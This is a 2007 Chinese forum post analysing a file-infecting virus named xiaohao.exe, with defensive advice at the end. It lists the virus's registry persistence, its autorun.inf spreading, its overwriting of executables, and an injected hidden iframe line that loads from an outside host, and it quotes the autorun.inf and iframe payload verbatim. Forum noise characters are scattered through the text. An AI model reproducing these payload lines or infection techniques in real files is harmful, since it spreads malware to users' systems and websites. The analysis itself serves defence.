|
|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe6 \7 ^2 k7 k# O( D$ j+ ?! e% }
Size: 12288 bytes% B6 {6 O* e( k8 y) f# z0 s
File Version: 1, 0, 0, 1
$ U/ ~& n# ?9 h8 |Modified: 2007年8月14日, 21:03:22
& ?* n) b5 p* S4 T1 d) k; ZMD5: B50ED06B61CDCF060D0136784999E50C
( o/ V& F- T2 ?# T4 N5 Q5 L) dSHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD% W- a9 _/ j" p$ ~0 b4 S9 k1 u
CRC32: 5CC1E47A# D4 X, ?/ d, S+ [* V! f2 A2 ?
加壳方式:UPX
$ s$ R) T: r0 Q- {病毒运行后:; T' b3 b, A0 R; T: ?' b3 N- J
1.生成如下文件:. c& j! G! x' _
%SystemRoot%\system32\exloroe.exe/ i" d4 L; Y$ J1 _) G4 {
每个分区下生成一个xiaohao.exe 和autorun.inf, n+ ?' j1 p' X; H# A: T! s
autorun.inf内容( _: Y8 {/ s, s8 |3 _9 {
[Autorun]
. w7 t" x8 U; c/ A/ _- g% h0 Yopen=Xiaohao.exe0 Y: L: J$ t1 o' A" Z# S
shellexecute=Xiaohao.exe- S! V% U% z/ Q2 C, g
shell\Auto\command=Xiaohao.exe
# m$ o) B8 c f3 r; d2.添加注册表项目5 O& E3 V+ ^. Y5 }* k
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}+ d9 ~3 O9 T/ G, f
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的2 q% A0 X% Q1 Q& m, |1 R; M
3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000% b* R, e7 H# f, e! M
破坏显示隐藏文件
# a. W( h- J+ N" Z: ]删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu20 _& N. C- u7 u! p- [7 I# O1 i
从而删除开始菜单中所有的快捷方式
( w9 H9 D# h( j X6 o G4.感染文件# L$ q+ W- e8 f0 ?; q8 E$ T6 `. J
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的
1 x$ \1 E" l* }. Dexe无法修复
) b; b; N9 ^5 M7 [- e/ v从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码' [+ \$ K& R: c) H
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>0 L# a9 C. I u* H- r8 ^# m, _, |
所有感染的文件的文件名记录在C:\Jilu.txt里面
2 r# N) t3 U2 f$ P3 x6 s& A( j并将所有未能感染的文件属性变为隐藏
3 j9 G; U- D& s# w0 a! d. F5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”/ i. t# F6 b" B: ?! q2 ` B
6.系统时间改为2005年1月17日
4 B ~! e! o% n$ |3 o2 w5 c病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。7 A& \: s) ]* H/ l
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败- m3 W& d! I$ i' |! n4 j7 g
如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉
" [" e* j3 A. d9 c2 ~希望大家注意如下几点防范此类病毒& q' a+ l G, ]% S$ V( s! O
1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)4 Y# l' s3 L7 Y2 u8 `- M" ]
2.及时升级杀毒软件,防火墙,一定打全系统补丁+ C* h" j) Y6 S) x
3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可 |
|
IP卡
狗仔卡
发表于 2007-9-16 09:33:42
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
楼主